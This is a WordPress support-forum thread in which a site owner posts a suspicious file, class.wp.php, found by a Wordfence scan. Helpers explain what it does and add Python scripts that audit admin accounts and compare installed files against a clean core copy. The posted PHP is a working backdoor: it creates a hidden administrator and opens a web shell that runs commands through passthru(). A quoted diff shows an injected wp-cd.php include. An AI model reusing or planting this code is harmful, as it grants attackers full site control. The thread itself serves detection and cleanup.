Title: Class.wp.php
Last modified: October 28, 2016

---

# Class.wp.php

 *  Resolved [swhz](https://wordpress.org/support/users/swhz/)
 * (@swhz)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/)
 * I run bazar shop theme on my website.
 * When I scanned with Wordfence, it detected that an unknown file was in my wp-includes
   directory named class.wp.php. I deleted the file from the directory 
   but have kept it on my desktop for observation. I am posting the code here; kindly
   tell me if it is malicious or not, or if it has other files as well.
 *     ```
       <?php error_reporting(0);
       include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
       $table_name = $wpdb->get_blog_prefix();
       $sample = 'a:1:{s:13:"administrator";b:1;}';
       if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
       if( isset($_GET['awu']) ) {
       $wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', 't@e.st', '', '2011-06-07 00:00:00', '', '0', '1001010');");
       $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
       $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
       if( isset($_GET['dwu']) ) { 
       $wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 1001010");
       $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 1001010");} 
       if( isset($_GET['console']) ) {function  MakeSimpleForm() { ?> <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
       <input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form> <? } function DoCmd($cmd) { ?>
       <textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
       DoCmd($_REQUEST['cmd']); else MakeSimpleForm();}?>
       ```
   

Viewing 10 replies - 1 through 10 (of 10 total)

 *  [wfalaa](https://wordpress.org/support/users/wfalaa/)
 * (@wfalaa)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8391663)
 * Hi swhz,
   Using this code, someone may insert/delete a new user into your database
   with admin privileges. You did the right thing by deleting this file. I 
   would also recommend the following:
    -  Make sure you have WordPress, themes and plugins all updated to the latest stable version.
    -  Change your FTP/cPanel password.
    -  Compare the number of users you have in (WordPress Dashboard > Users) with those 
       in the “wp_users” database table.
 * Thanks.
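
An added example, not part of the reply above and not Wordfence code: the user comparison it recommends, written as queries against a constructed in-memory SQLite copy of `wp_users` and `wp_usermeta` (the `wp_` prefix, the `siteowner` account and all sample rows are assumptions). It also looks for orphaned `usermeta` rows, because the `dwu` branch of the posted file deletes only the `users` row and the row with `umeta_id = 1001010`, which leaves the `user_level` row behind.

```python
import sqlite3

PREFIX = "wp_"  # assumption: default table prefix; use your own $table_prefix
ADMIN_CAPS = 'a:1:{s:13:"administrator";b:1;}'  # capabilities value from the posted file

def build_sample_db(after_cleanup):
    """Constructed sample data: one real admin plus the rows the file creates.
    after_cleanup=True models the state left once its delete branch has run."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE {PREFIX}users (ID INTEGER PRIMARY KEY, "
               "user_login TEXT, user_email TEXT, user_registered TEXT)")
    db.execute(f"CREATE TABLE {PREFIX}usermeta (umeta_id INTEGER PRIMARY KEY, "
               "user_id INTEGER, meta_key TEXT, meta_value TEXT)")
    users = [(1, "siteowner", "owner@example.com", "2015-03-02 10:00:00")]
    meta = [(1, 1, f"{PREFIX}capabilities", ADMIN_CAPS),
            (2, 1, f"{PREFIX}user_level", "10"),
            # constructed id: this row is inserted with umeta_id NULL, so the
            # database assigns it an auto-increment id, not 1001010
            (1001011, 1001010, f"{PREFIX}user_level", "10")]
    if not after_cleanup:
        users.append((1001010, "1001010", "t@e.st", "2011-06-07 00:00:00"))
        meta.append((1001010, 1001010, f"{PREFIX}capabilities", ADMIN_CAPS))
    db.executemany(f"INSERT INTO {PREFIX}users VALUES (?,?,?,?)", users)
    db.executemany(f"INSERT INTO {PREFIX}usermeta VALUES (?,?,?,?)", meta)
    return db

def list_admins(db):
    """Every account whose capabilities row grants the administrator role."""
    return db.execute(
        f"SELECT u.ID, u.user_login, u.user_email, u.user_registered "
        f"FROM {PREFIX}users u JOIN {PREFIX}usermeta m ON m.user_id = u.ID "
        f"WHERE m.meta_key = ? AND m.meta_value LIKE ? ORDER BY u.ID",
        (f"{PREFIX}capabilities", '%"administrator"%')).fetchall()

def orphaned_meta(db):
    """usermeta rows whose user_id no longer exists in the users table."""
    return db.execute(
        f"SELECT m.umeta_id, m.user_id, m.meta_key, m.meta_value "
        f"FROM {PREFIX}usermeta m LEFT JOIN {PREFIX}users u ON u.ID = m.user_id "
        f"WHERE u.ID IS NULL ORDER BY m.umeta_id").fetchall()

def audit(db, expected_admins):
    """Report admins not on the owner's list, plus leftover metadata rows."""
    return {"unexpected_admins": [row for row in list_admins(db)
                                  if row[1] not in expected_admins],
            "orphaned_meta": orphaned_meta(db)}

if __name__ == "__main__":
    for state in (False, True):
        print("after cleanup" if state else "account present",
              audit(build_sample_db(state), {"siteowner"}))
```

The two SELECT statements use only standard joins, so they can be run directly against the site's MySQL database once the prefix is adjusted.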
 *  Thread Starter [swhz](https://wordpress.org/support/users/swhz/)
 * (@swhz)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8397301)
 * Thank you very much for replying.
 * I have done as you said, fortunately there are no suspicious users in the database.
 * Thank you again for helping and thank you for the amazing plugin.
 *  [gameslopedy](https://wordpress.org/support/users/yiggory/)
 * (@yiggory)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8397910)
 * > Filename: wp-includes/post.php
   >
   > File type: WordPress Core File
   >
   > | Line | The Original Version of the file | The Modified Version on your WordPress system |
   > | --- | --- | --- |
   > | 1 | `<?php` | `<?php if (file_exists(dirname(__FILE__) . '/wp-cd.php')) include_once(dirname(__FILE__) . '/wp-cd.php'); ?><?php` |
   > | 2 | `/**` | `/**` |
   > | 3 | `* Core Post API` | `* Core Post API` |
   > | 4 | `*` | `*` |
 *  [wfalaa](https://wordpress.org/support/users/wfalaa/)
 * (@wfalaa)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8399534)
 * [@yiggory](https://wordpress.org/support/users/yiggory/) Following up on [your thread here](https://wordpress.org/support/topic/critical-problem-what-do-i-have-to-do/),
   I recommend choosing the “Restore the original version of this file.” option, as 
   there is no “wp-cd.php” file in a default WordPress installation.
 * Thanks.
 *  [gameslopedy](https://wordpress.org/support/users/yiggory/)
 * (@yiggory)
 * [9 years, 6 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8399905)
 * ok restored and also deleted other warning files.
 *  [fitbox](https://wordpress.org/support/users/fitmealat/)
 * (@fitmealat)
 * [9 years, 2 months ago](https://wordpress.org/support/topic/class-wp-php/#post-8852245)
 * Had the same suspicious file in my system. Deleted… and guess what, it came back.
   Looking for the culprit now.
   Does anybody have an idea how to best track the
   creation of this file?
 *  [Adam Patterson](https://wordpress.org/support/users/adampatterson/)
 * (@adampatterson)
 * [9 years ago](https://wordpress.org/support/topic/class-wp-php/#post-9110090)
 * I have found some entries in your active themes function.php file, as well as
   `wp-post.php` (looking for `wp-cd.php`) and a DB entry, but I forgot what the
   table was called.
 * The strange thing is that I noticed this locally. Almost all of my local WordPress
   sites had this happen to them.
 * All of my local sites are .dev extensions, so to have them mostly affected is 
   strange. If you do find out what causes it, please let me know. I usually use 
   the same group of plugins on every site.
 *  [wfalaa](https://wordpress.org/support/users/wfalaa/)
 * (@wfalaa)
 * [9 years ago](https://wordpress.org/support/topic/class-wp-php/#post-9112172)
 * [@adampatterson](https://wordpress.org/support/users/adampatterson/) I’m not 
   sure what you mean by “active themes function.php file”. Is this something
   related to the Wordfence plugin?
 * Thanks.
 *  [Adam Patterson](https://wordpress.org/support/users/adampatterson/)
 * (@adampatterson)
 * [9 years ago](https://wordpress.org/support/topic/class-wp-php/#post-9112790)
 * [@wfalaa](https://wordpress.org/support/users/wfalaa/) I was not using WordFence
   sorry, I was searching out ‘wp-cd.php’ and offering my observations.
 *  [mokumax](https://wordpress.org/support/users/mokumax/)
 * (@mokumax)
 * [8 years, 8 months ago](https://wordpress.org/support/topic/class-wp-php/#post-9469852)
 * I got an alert for wp-includes/class-wp.php. I downloaded the latest from wordpress.org
   and the file was identical.
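
An added example, not code from any poster or from Wordfence: the comparison against a clean WordPress download that the replies describe, run over two constructed directory trees. It separates files that do not exist in core (`class.wp.php`), files identical to core (`class-wp.php`), and core files that are the original with something prepended, as in the `post.php` scan result quoted earlier. The directory layout, file contents and function names are assumptions.

```python
import os
import tempfile

# Prefix shown in the quoted scan result for wp-includes/post.php
INJECTED = ("<?php if (file_exists(dirname(__FILE__) . '/wp-cd.php')) "
            "include_once(dirname(__FILE__) . '/wp-cd.php'); ?>")

def read_tree(root):
    """Map each relative path under root to its raw bytes."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                files[os.path.relpath(path, root).replace(os.sep, "/")] = fh.read()
    return files

def compare_core(installed_root, pristine_root):
    """Classify every installed file against a clean copy of the same release."""
    installed, pristine = read_tree(installed_root), read_tree(pristine_root)
    report = {}
    for rel, data in installed.items():
        if rel not in pristine:
            report[rel] = ("unknown", None)            # not a core file at all
        elif data == pristine[rel]:
            report[rel] = ("identical", None)
        elif data.endswith(pristine[rel]):             # original kept, code added in front
            added = data[:len(data) - len(pristine[rel])]
            report[rel] = ("prepended", added.decode("utf-8", "replace"))
        else:
            report[rel] = ("modified", None)
    return report

def run_sample():
    """Build constructed 'pristine' and 'installed' trees and compare them."""
    core = {"class-wp.php": "<?php\nclass WP {}\n",
            "post.php": "<?php\n/**\n * Core Post API\n *\n */\n"}
    site = dict(core, **{"post.php": INJECTED + core["post.php"],
                         "class.wp.php": "<?php /* constructed placeholder */\n"})
    with tempfile.TemporaryDirectory() as base:
        for label, tree in (("pristine", core), ("installed", site)):
            os.makedirs(os.path.join(base, label))
            for name, text in tree.items():
                with open(os.path.join(base, label, name), "wb") as fh:
                    fh.write(text.encode("utf-8"))
        return compare_core(os.path.join(base, "installed"),
                            os.path.join(base, "pristine"))

if __name__ == "__main__":
    for rel, (status, added) in sorted(run_sample().items()):
        print(rel, status, added or "")
```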


The topic ‘Class.wp.php’ is closed to new replies.

## Tags

 * [class](https://wordpress.org/support/topic-tag/class/)
 * [silence is golden](https://wordpress.org/support/topic-tag/silence-is-golden/)

 * 10 replies
 * 6 participants
 * Last reply from: [mokumax](https://wordpress.org/support/users/mokumax/)
 * Last activity: [8 years, 8 months ago](https://wordpress.org/support/topic/class-wp-php/#post-9469852)
 * Status: resolved